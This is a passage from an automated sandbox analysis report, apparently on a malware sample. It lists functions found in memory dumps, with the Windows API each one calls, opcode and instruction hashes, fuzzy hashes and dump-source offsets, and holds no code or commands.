                                                        • Instruction ID: f9770ecf61a9fe3211a6dd6de588ca95786f1d7d839ec4f50e1717eebc76987b
                                                        • Opcode Fuzzy Hash: 1334c81d895e416706b0cfbd6d73970cf326fbe0648da016e28cb08b43ddd249
                                                        • Instruction Fuzzy Hash: 8611B272500304EFEB21DF65DC45FA6FBA8EF44720F1485AAE909DB181D770A905CBB1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01B9BA10, Relevance: 1.6, APIs: 1, Instructions: 60fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • CreateFileW.KERNELBASE(?,?,?,?,?,?,?), ref: 01B9BA7E
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.2119358544.0000000001B9A000.00000040.00000001.sdmp, Offset: 01B9A000, based on PE: false
                                                        Similarity
                                                        • API ID: CreateFile
                                                        • String ID:
                                                        • API String ID: 823142352-0
                                                        • Opcode ID: e347bf5cd6236ecbb190f0ced07c15ae8767cdfba2f821bccb9e8ecbdb4bf019
                                                        • Instruction ID: 76b47a8ecf629b61be0ebaa42a306f20209ec85bfc0ae482d8beaf76eaffe5a9
                                                        • Opcode Fuzzy Hash: e347bf5cd6236ecbb190f0ced07c15ae8767cdfba2f821bccb9e8ecbdb4bf019
                                                        • Instruction Fuzzy Hash: B3119D72508384AFDB22CF65DC44F52FFF4EF05210F0884AEE9898B662D375A419CB61
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 02770886, Relevance: 1.6, APIs: 1, Instructions: 60fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • ReadFile.KERNELBASE(?,00000E9C,97F8F4CE,00000000,00000000,00000000,00000000), ref: 027708E5
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.2124067953.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                        Similarity
                                                        • API ID: FileRead
                                                        • String ID:
                                                        • API String ID: 2738559852-0
                                                        • Opcode ID: 0cbc258fe8080257ae74e5edb765555a6b8256117f268c3edb5889c4863976af
                                                        • Instruction ID: 3d0877251f09bc18944745b0c2de5fffee4092e519e4541a96bd0ab8feb9403e
                                                        • Opcode Fuzzy Hash: 0cbc258fe8080257ae74e5edb765555a6b8256117f268c3edb5889c4863976af
                                                        • Instruction Fuzzy Hash: 6911CE72400304EFFB21CF51DC85FA6FBE8EF14720F0885AAED49AA241C671A904CBB1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01B9A33C, Relevance: 1.6, APIs: 1, Instructions: 55COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SetErrorMode.KERNELBASE(?), ref: 01B9A39C
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.2119358544.0000000001B9A000.00000040.00000001.sdmp, Offset: 01B9A000, based on PE: false
                                                        Similarity
                                                        • API ID: ErrorMode
                                                        • String ID:
                                                        • API String ID: 2340568224-0
                                                        • Opcode ID: 90922fa193b2110d0c5902748aa6ed77f47e7762dd7502c9881b3c3302699f8b
                                                        • Instruction ID: 7e1ba64c5cc3489ba0601333bad400529d70fb97d01d4a2d0b8a7b3d337a4882
                                                        • Opcode Fuzzy Hash: 90922fa193b2110d0c5902748aa6ed77f47e7762dd7502c9881b3c3302699f8b
                                                        • Instruction Fuzzy Hash: B0114C715093C49FEB128B25DC54BA2BFB4DF47624F0880DBEDC58F263D265A809DB62
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 027712D8, Relevance: 1.6, APIs: 1, Instructions: 55COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SetConsoleTextAttribute.KERNEL32(?,?), ref: 0277132F
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.2124067953.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                        Similarity
                                                        • API ID: AttributeConsoleText
                                                        • String ID:
                                                        • API String ID: 646522457-0
                                                        • Opcode ID: cc9e7ccb96a04b4e28117e551a4eb9c1d3fb469c6f81481afced6ac5906f601b
                                                        • Instruction ID: 8b7801f88c0f10b4af7cfefd02b809651fdbc1300c1439b7a3c3d2146b3bd327
                                                        • Opcode Fuzzy Hash: cc9e7ccb96a04b4e28117e551a4eb9c1d3fb469c6f81481afced6ac5906f601b
                                                        • Instruction Fuzzy Hash: CF1191715093849FDB118F25DC45B96FFE4EF06220F0984EFED498B652D375A808CB61
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 027705E8, Relevance: 1.6, APIs: 1, Instructions: 54fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • UnmapViewOfFile.KERNELBASE(?), ref: 02770640
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.2124067953.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                        Similarity
                                                        • API ID: FileUnmapView
                                                        • String ID:
                                                        • API String ID: 2564024751-0
                                                        • Opcode ID: 030713d6753134e5a2331eaa891998b701a2841e0c4f073dd0117c0ee7a0206f
                                                        • Instruction ID: 97b871bd7e050035c19b1a31ac6b28d18e5cd4f1ea3169a4fa96da6929a1346d
                                                        • Opcode Fuzzy Hash: 030713d6753134e5a2331eaa891998b701a2841e0c4f073dd0117c0ee7a0206f
                                                        • Instruction Fuzzy Hash: E711C2765093C09FDB128B15DC95B52FFB4DF42224F0880DBED858B663D275A908CB62
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01B9AA0F, Relevance: 1.6, APIs: 1, Instructions: 53COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetConsoleOutputCP.KERNEL32 ref: 01B9AA71
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.2119358544.0000000001B9A000.00000040.00000001.sdmp, Offset: 01B9A000, based on PE: false
                                                        Similarity
                                                        • API ID: ConsoleOutput
                                                        • String ID:
                                                        • API String ID: 3985236979-0
                                                        • Opcode ID: fcc5e0bc9af140e43a5ff5ae365d8720c8106a947f0170e2c117e0d34185d8dc
                                                        • Instruction ID: 5f347eeddeb1dfbd8cd48392d2da65004cc90025006a53f69b6a7dee878f3709
                                                        • Opcode Fuzzy Hash: fcc5e0bc9af140e43a5ff5ae365d8720c8106a947f0170e2c117e0d34185d8dc
                                                        • Instruction Fuzzy Hash: BC11A37540D7C09FDB128B25DC85B91BFB4EF43224F0980DBDD858F163D269A909D762
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01B9AAD2, Relevance: 1.6, APIs: 1, Instructions: 53COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • LookupPrivilegeValueW.ADVAPI32(?,?,?), ref: 01B9AB1A
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.2119358544.0000000001B9A000.00000040.00000001.sdmp, Offset: 01B9A000, based on PE: false
                                                        Similarity
                                                        • API ID: LookupPrivilegeValue
                                                        • String ID:
                                                        • API String ID: 3899507212-0
                                                        • Opcode ID: 729cf4087a264e7ea82ea760463d796c625563740b998990bda16aca50789adb
                                                        • Instruction ID: d188786c8f3276a2550d3ad9dcf84501382b58b051803d90a7efc2fa54367f08
                                                        • Opcode Fuzzy Hash: 729cf4087a264e7ea82ea760463d796c625563740b998990bda16aca50789adb
                                                        • Instruction Fuzzy Hash: F6115EB26003009FEB24DF29DC85B56FBD8EB05621F08C4BAED09DB642D774E405CA61
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0277092F, Relevance: 1.6, APIs: 1, Instructions: 53COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetSystemInfo.KERNELBASE(?), ref: 0277099C
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.2124067953.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                        Similarity
                                                        • API ID: InfoSystem
                                                        • String ID:
                                                        • API String ID: 31276548-0
                                                        • Opcode ID: dd48c35c0239102b287ca239b6e9310f7cd4729164d3d83c56ac77068d11c64e
                                                        • Instruction ID: 14da10b77e2f5e570fc1eed269a942b20962785ce3389bcc5e6ad8581542c3ed
                                                        • Opcode Fuzzy Hash: dd48c35c0239102b287ca239b6e9310f7cd4729164d3d83c56ac77068d11c64e
                                                        • Instruction Fuzzy Hash: 48119D714093C49FEB128B25DC55B92BFA4EF07324F0980DBD9884B263D265A908CB62
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 027707C6, Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetFileType.KERNELBASE(?,00000E9C,97F8F4CE,00000000,00000000,00000000,00000000), ref: 02770819
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.2124067953.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                        Similarity
                                                        • API ID: FileType
                                                        • String ID:
                                                        • API String ID: 3081899298-0
                                                        • Opcode ID: 4957a9f0d898ff2539f7b079e8fbfff25b49d42e9622174943609868bafb0600
                                                        • Instruction ID: c31174132ef29f905ac1555bfc7094d5bef933940862637130526989fc718ecd
                                                        • Opcode Fuzzy Hash: 4957a9f0d898ff2539f7b079e8fbfff25b49d42e9622174943609868bafb0600
                                                        • Instruction Fuzzy Hash: 9F018C72500704EFFB209F15DC86FA6FB98DF44720F18C4AAFD099A281D674A904CAA2
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 027713AA, Relevance: 1.6, APIs: 1, Instructions: 51COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.2124067953.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                        Similarity
                                                        • API ID: ConsoleWrite
                                                        • String ID:
                                                        • API String ID: 2657657451-0
                                                        • Opcode ID: 830f75a1cd23f4a65b6e2f2219017f23388353d4802b489ca8e88c7440e17c42
                                                        • Instruction ID: 50e9189ff5df21a0f14c0adf5819b94aeff35c03d66912ff5297957c30900417
                                                        • Opcode Fuzzy Hash: 830f75a1cd23f4a65b6e2f2219017f23388353d4802b489ca8e88c7440e17c42
                                                        • Instruction Fuzzy Hash: 9F117976500700DFEF20CF56D885B66FBA4EB04620F0884AAED4A9A652D371E418CB61
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01B9AB75, Relevance: 1.6, APIs: 1, Instructions: 50COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetLogicalDrives.KERNELBASE ref: 01B9ABC9
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.2119358544.0000000001B9A000.00000040.00000001.sdmp, Offset: 01B9A000, based on PE: false
                                                        Similarity
                                                        • API ID: DrivesLogical
                                                        • String ID:
                                                        • API String ID: 999431828-0
                                                        • Opcode ID: cba5a722a1daf2215e999dbd8f5cef5fd9a5b55658e6bd8ccec4ac7f3748850e
                                                        • Instruction ID: 91553c1e9b22e125d15dfe7e2c9e1a43068324c55f4c45083f79408762174620
                                                        • Opcode Fuzzy Hash: cba5a722a1daf2215e999dbd8f5cef5fd9a5b55658e6bd8ccec4ac7f3748850e
                                                        • Instruction Fuzzy Hash: 4A117CB65093809FDB11CF65DC85B92BFA4EB42224F0984EBED498F253D275A508CB61
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01B9BA32, Relevance: 1.5, APIs: 1, Instructions: 49fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • CreateFileW.KERNELBASE(?,?,?,?,?,?,?), ref: 01B9BA7E
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.2119358544.0000000001B9A000.00000040.00000001.sdmp, Offset: 01B9A000, based on PE: false
                                                        Similarity
                                                        • API ID: CreateFile
                                                        • String ID:
                                                        • API String ID: 823142352-0
                                                        • Opcode ID: 8fd2bf02cef2d1b89ec027652ca7bcfee2e7784abfad9a75cdbffcf6de9f02d1
                                                        • Instruction ID: 4cb52a558c25bc2d2e9c2233987ab7f6b9a5a82fd131fc4f2c117b79c163ba62
                                                        • Opcode Fuzzy Hash: 8fd2bf02cef2d1b89ec027652ca7bcfee2e7784abfad9a75cdbffcf6de9f02d1
                                                        • Instruction Fuzzy Hash: 8211CE32400704DFEF21CF55DD84B52FBE4EF04221F0885AAED498A612D735E404DB61
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01B9A1EE, Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SetConsoleCtrlHandler.KERNEL32(?,00000E9C,?,?), ref: 01B9A23E
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.2119358544.0000000001B9A000.00000040.00000001.sdmp, Offset: 01B9A000, based on PE: false
                                                        Similarity
                                                        • API ID: ConsoleCtrlHandler
                                                        • String ID:
                                                        • API String ID: 1513847179-0
                                                        • Opcode ID: b5a608cbad99be3e9ee9777eaefb6ed4ad525da3271ce2b7e4344940b01324b9
                                                        • Instruction ID: 27d2ef8293c5571488ec89412088537fac4ccc561cf67253ace99942bee55b48
                                                        • Opcode Fuzzy Hash: b5a608cbad99be3e9ee9777eaefb6ed4ad525da3271ce2b7e4344940b01324b9
                                                        • Instruction Fuzzy Hash: E1017171900600AFE310DF16DC46B66FBE8FB84A20F14816AED089B741D235B515CBE5
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0277104E, Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetVolumeInformationW.KERNELBASE(?,00000E9C,?,?), ref: 0277109E
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.2124067953.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                        Similarity
                                                        • API ID: InformationVolume
                                                        • String ID:
                                                        • API String ID: 2039140958-0
                                                        • Opcode ID: c7ec6bf9c9e225b95aa22d17033e29e92afe374d9c4391ff31f8fd246c05afa6
                                                        • Instruction ID: 543c7cf37c687a85940cb993718c5fe44cfbb188c1f2e9326fdecf54d1784c00
                                                        • Opcode Fuzzy Hash: c7ec6bf9c9e225b95aa22d17033e29e92afe374d9c4391ff31f8fd246c05afa6
                                                        • Instruction Fuzzy Hash: 4D017171900600AFE310DF16DC46B66FBE8FB84A20F14816AED099B741D335B515CBE5
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 02770196, Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SetConsoleTitleW.KERNEL32(?), ref: 027701D0
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.2124067953.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                        Similarity
                                                        • API ID: ConsoleTitle
                                                        • String ID:
                                                        • API String ID: 3358957663-0
                                                        • Opcode ID: 158cf301400ff22189b7a094428663079bf4001a698bbaaf7566567c29318cb0
                                                        • Instruction ID: 1a20e4a9dd83e9f7dad40c55c36bb07f7437c4a7f5b6095688581fe354e5dc5a
                                                        • Opcode Fuzzy Hash: 158cf301400ff22189b7a094428663079bf4001a698bbaaf7566567c29318cb0
                                                        • Instruction Fuzzy Hash: BE015A726047449FEB20DF6ADC857AAFBE8EB01621F1884ABDC09DB642D774E404CA61
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01B9BAFA, Relevance: 1.5, APIs: 1, Instructions: 44COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.2119358544.0000000001B9A000.00000040.00000001.sdmp, Offset: 01B9A000, based on PE: false
                                                        Similarity
                                                        • API ID: ConsoleMode
                                                        • String ID:
                                                        • API String ID: 4145635619-0
                                                        • Opcode ID: f83abcc5b369863110410eb5c9505477fcad36f0b2934d551f6bd619030cf572
                                                        • Instruction ID: 65beb1f0503bada7588997d52e581edced4c81bfeabfef8c869b18d8e09ce695
                                                        • Opcode Fuzzy Hash: f83abcc5b369863110410eb5c9505477fcad36f0b2934d551f6bd619030cf572
                                                        • Instruction Fuzzy Hash: ED019A71500200DFEB208F19ED85BA5FBA4EB04620F08C4ABDD098B696D375A804CB61
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 027712FA, Relevance: 1.5, APIs: 1, Instructions: 44COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SetConsoleTextAttribute.KERNEL32(?,?), ref: 0277132F
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.2124067953.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                        Similarity
                                                        • API ID: AttributeConsoleText
                                                        • String ID:
                                                        • API String ID: 646522457-0
                                                        • Opcode ID: a2cbeb2b60e378cdf8b88057b4793838392efbc3801af902a7bf90c898eae1ab
                                                        • Instruction ID: c17a69445490954e8c04f6dc45ea4914c9e91eae211666b7eb07d211c5a354f9
                                                        • Opcode Fuzzy Hash: a2cbeb2b60e378cdf8b88057b4793838392efbc3801af902a7bf90c898eae1ab
                                                        • Instruction Fuzzy Hash: D101BC71504300DFEF108F15DC85BA5FBE4EF04620F48C4ABDC099BA42D275A404CB61
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01B9A8FA, Relevance: 1.5, APIs: 1, Instructions: 43threadCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SetThreadPreferredUILanguages.KERNEL32(?,00000E9C,?,?), ref: 01B9A94A
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.2119358544.0000000001B9A000.00000040.00000001.sdmp, Offset: 01B9A000, based on PE: false
                                                        Similarity
                                                        • API ID: LanguagesPreferredThread
                                                        • String ID:
                                                        • API String ID: 842807343-0
                                                        • Opcode ID: 73ce0b335e4f317d732cf7aaf9396949e1eb859a8d096077842abf1c14329d00
                                                        • Instruction ID: d08de2cec692782b5c60d1601b1c904b2bd67e766cfcdfa4bed6bde939b58492
                                                        • Opcode Fuzzy Hash: 73ce0b335e4f317d732cf7aaf9396949e1eb859a8d096077842abf1c14329d00
                                                        • Instruction Fuzzy Hash: 7D016271900600ABD310DF16DC46B26FBE4FB88B20F14815AED085BB41D275F515CBE6
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 02770F76, Relevance: 1.5, APIs: 1, Instructions: 43COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetDriveTypeW.KERNELBASE(?), ref: 02770FB0
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.2124067953.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                        Similarity
                                                        • API ID: DriveType
                                                        • String ID:
                                                        • API String ID: 338552980-0
                                                        • Opcode ID: 64e8f6d3d05aeb27458790176deebca15c515d2197feddacb6e078dcd10b95e4
                                                        • Instruction ID: 65e9266d6aa7bb52e73e2be2e817b3933bcd430a3bba4b86981c8ba15076636d
                                                        • Opcode Fuzzy Hash: 64e8f6d3d05aeb27458790176deebca15c515d2197feddacb6e078dcd10b95e4
                                                        • Instruction Fuzzy Hash: 35017871904340DFEB20DF15D885BA6FBE4EB02620F0884AADC09DF246D374E408CAA2
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 027704B2, Relevance: 1.5, APIs: 1, Instructions: 43COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SHGetFolderPathW.SHELL32(?,00000E9C,?,?), ref: 02770502
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.2124067953.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                        Similarity
                                                        • API ID: FolderPath
                                                        • String ID:
                                                        • API String ID: 1514166925-0
                                                        • Opcode ID: 3f8624151dbe0c0fb1db55bf1f5034eb29a5c1d2cefb4bf2fc295f7bb2dcacff
                                                        • Instruction ID: 3e79dd91e9bdac03dc6d027f09d6dfe8729ac701d5771afd91967d19515e3426
                                                        • Opcode Fuzzy Hash: 3f8624151dbe0c0fb1db55bf1f5034eb29a5c1d2cefb4bf2fc295f7bb2dcacff
                                                        • Instruction Fuzzy Hash: AE016271900600ABD310DF16DC46F26FBE4FB88B20F14815AED085BB41D275F515CBE6
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0277060E, Relevance: 1.5, APIs: 1, Instructions: 39fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • UnmapViewOfFile.KERNELBASE(?), ref: 02770640
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.2124067953.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                        Similarity
                                                        • API ID: FileUnmapView
                                                        • String ID:
                                                        • API String ID: 2564024751-0
                                                        • Opcode ID: 14a3eedc777bac7d4e0ed431eeaab5a5d6f3e8c517097d18b3e23b045063346c
                                                        • Instruction ID: a24a75a9f228b72387812cceda6de42d6d9625f6316038d4654c025af3fa542e
                                                        • Opcode Fuzzy Hash: 14a3eedc777bac7d4e0ed431eeaab5a5d6f3e8c517097d18b3e23b045063346c
                                                        • Instruction Fuzzy Hash: 0801FF35600700CFEF208F15D889B61FBA0EF41620F08C0ABEC0A8B752D374E808CAA2
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01B9AB9A, Relevance: 1.5, APIs: 1, Instructions: 38COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetLogicalDrives.KERNELBASE ref: 01B9ABC9
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.2119358544.0000000001B9A000.00000040.00000001.sdmp, Offset: 01B9A000, based on PE: false
                                                        Similarity
                                                        • API ID: DrivesLogical
                                                        • String ID:
                                                        • API String ID: 999431828-0
                                                        • Opcode ID: 32306ffeb16748e5088a7bf336920cc8e637c6a5c24787cf3e1aec7a3aa8f6bd
                                                        • Instruction ID: 3fdc57fd5bbe4b26a7febcf74eab0ee04422e07188aa703948d544820f2b81ae
                                                        • Opcode Fuzzy Hash: 32306ffeb16748e5088a7bf336920cc8e637c6a5c24787cf3e1aec7a3aa8f6bd
                                                        • Instruction Fuzzy Hash: D701A931404240CFEB10DF29D889BA1FBA4EB00220F18C8EBDD098F202D374A404CAA2
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 02771116, Relevance: 1.5, APIs: 1, Instructions: 36threadCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SetThreadUILanguage.KERNEL32(?), ref: 02771148
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.2124067953.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                        Similarity
                                                        • API ID: LanguageThread
                                                        • String ID:
                                                        • API String ID: 243849632-0
                                                        • Opcode ID: 15bff0a1b9c154629f62e07db65a3732f68c59891662160bdc161e7f991e854d
                                                        • Instruction ID: 824162ab1d488135510fd54cfa4f8356a28916ed72d28ae68007ee5a87756a58
                                                        • Opcode Fuzzy Hash: 15bff0a1b9c154629f62e07db65a3732f68c59891662160bdc161e7f991e854d
                                                        • Instruction Fuzzy Hash: BCF0D735500640DFEB208F05D889B62FBA0EB00A21F88C0EBDC095F312D679A848CBA2
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01B9A36A, Relevance: 1.5, APIs: 1, Instructions: 35COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SetErrorMode.KERNELBASE(?), ref: 01B9A39C
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.2119358544.0000000001B9A000.00000040.00000001.sdmp, Offset: 01B9A000, based on PE: false
                                                        Similarity
                                                        • API ID: ErrorMode
                                                        • String ID:
                                                        • API String ID: 2340568224-0
                                                        • Opcode ID: 0bdf7d35fa84e4f2e6da71bb1adb4065ab965d9f86aef56ee4cb94d319c3af2b
                                                        • Instruction ID: 266a5c60e90e89f9359887198c32b2308b110260c8c2667781af8bad7f2d0b27
                                                        • Opcode Fuzzy Hash: 0bdf7d35fa84e4f2e6da71bb1adb4065ab965d9f86aef56ee4cb94d319c3af2b
                                                        • Instruction Fuzzy Hash: 29F0AF35508744DFEB209F15D8C9765FBA0EF04621F08C1EADD094B752D3B5A404CAA2
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0277096A, Relevance: 1.5, APIs: 1, Instructions: 35COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetSystemInfo.KERNELBASE(?), ref: 0277099C
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.2124067953.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                        Similarity
                                                        • API ID: InfoSystem
                                                        • String ID:
                                                        • API String ID: 31276548-0
                                                        • Opcode ID: b6da2f409f4c66c0e8732d437fd7a7375d52dcf8d6406691a1b0cc9842b2a862
                                                        • Instruction ID: 41ded3988b5e4d9eb5072a1d8e8e24e879c839862fcf7cbdc6d52d4700d86cfc
                                                        • Opcode Fuzzy Hash: b6da2f409f4c66c0e8732d437fd7a7375d52dcf8d6406691a1b0cc9842b2a862
                                                        • Instruction Fuzzy Hash: EEF0A935904744DFEB209F06D889B66FBA0EF15621F08C09ADD495B716D375A408CEA2
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01B9AA42, Relevance: 1.5, APIs: 1, Instructions: 34COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetConsoleOutputCP.KERNEL32 ref: 01B9AA71
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.2119358544.0000000001B9A000.00000040.00000001.sdmp, Offset: 01B9A000, based on PE: false
                                                        Similarity
                                                        • API ID: ConsoleOutput
                                                        • String ID:
                                                        • API String ID: 3985236979-0
                                                        • Opcode ID: 693c86379312ac8f64f33926845be4970f93d8ced8914ee14328dd28d27220ed
                                                        • Instruction ID: ecce40ed2e7887b6e4b23456b61e99057a027aad0735799ba900854bce4af392
                                                        • Opcode Fuzzy Hash: 693c86379312ac8f64f33926845be4970f93d8ced8914ee14328dd28d27220ed
                                                        • Instruction Fuzzy Hash: F2F0CD31504B40CFEF20CF29D989761FBA0EF44621F08C0EADD094B652D378A504CAA2
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01B9A974, Relevance: 1.3, APIs: 1, Instructions: 54COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • CloseHandle.KERNELBASE(?), ref: 01B9A9C8
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.2119358544.0000000001B9A000.00000040.00000001.sdmp, Offset: 01B9A000, based on PE: false
                                                        Similarity
                                                        • API ID: CloseHandle
                                                        • String ID:
                                                        • API String ID: 2962429428-0
                                                        • Opcode ID: 53ef88f248484029786ee455cb27fd8ab11377fa5e09f73d65bd7d75716b7df1
                                                        • Instruction ID: 3d5edfa76df612c736e6153cf0bb5402c82901e53199b07b496b1ff4a55fcc5d
                                                        • Opcode Fuzzy Hash: 53ef88f248484029786ee455cb27fd8ab11377fa5e09f73d65bd7d75716b7df1
                                                        • Instruction Fuzzy Hash: 2111A3715093849FDB12CF25DC45B92FFE4DF02220F0980EBED499B253D275A808CB61
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01B9A996, Relevance: 1.3, APIs: 1, Instructions: 43COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • CloseHandle.KERNELBASE(?), ref: 01B9A9C8
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.2119358544.0000000001B9A000.00000040.00000001.sdmp, Offset: 01B9A000, based on PE: false
                                                        Similarity
                                                        • API ID: CloseHandle
                                                        • String ID:
                                                        • API String ID: 2962429428-0
                                                        • Opcode ID: 84cb46aa4f4a188a5723a1930fd62ba5082e676175233a451f3b624990d41fbb
                                                        • Instruction ID: 63e8e40ea694f9cb4ed0c103390935320762b95aabb60a95e0b4b32bd317cfbd
                                                        • Opcode Fuzzy Hash: 84cb46aa4f4a188a5723a1930fd62ba5082e676175233a451f3b624990d41fbb
                                                        • Instruction Fuzzy Hash: F2018B75604640DFEB10DF29D9897A6FBA4EF06220F18C4FBDD099B642D779A804CB62
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 027807F7, Relevance: .0, Instructions: 46COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.2124080788.0000000002780000.00000040.00000040.sdmp, Offset: 02780000, based on PE: false
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 91f1ef0aa1dbc4b16f44c58dbf1cc19b52b5d74a1f75b250473b1104c63e9d1d
                                                        • Instruction ID: caa32ff726e9a6c0c9fbd85ef0fc2dad5ca027d5ed943cafd23dbba797df1767
                                                        • Opcode Fuzzy Hash: 91f1ef0aa1dbc4b16f44c58dbf1cc19b52b5d74a1f75b250473b1104c63e9d1d
                                                        • Instruction Fuzzy Hash: F1018B765093806FD7118B16DC40863FFF8DF87670749C49BEC498B612D2256905C771
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0278081E, Relevance: .0, Instructions: 27COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.2124080788.0000000002780000.00000040.00000040.sdmp, Offset: 02780000, based on PE: false
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 4baa31f28ad87bcea5cc346978232a3fccd349db31fa150f3a9e9dd6003a357a
                                                        • Instruction ID: 5af46887902561e349b76c99165538e9dcbb1e24fce9e7c34902345ac4584bba
                                                        • Opcode Fuzzy Hash: 4baa31f28ad87bcea5cc346978232a3fccd349db31fa150f3a9e9dd6003a357a
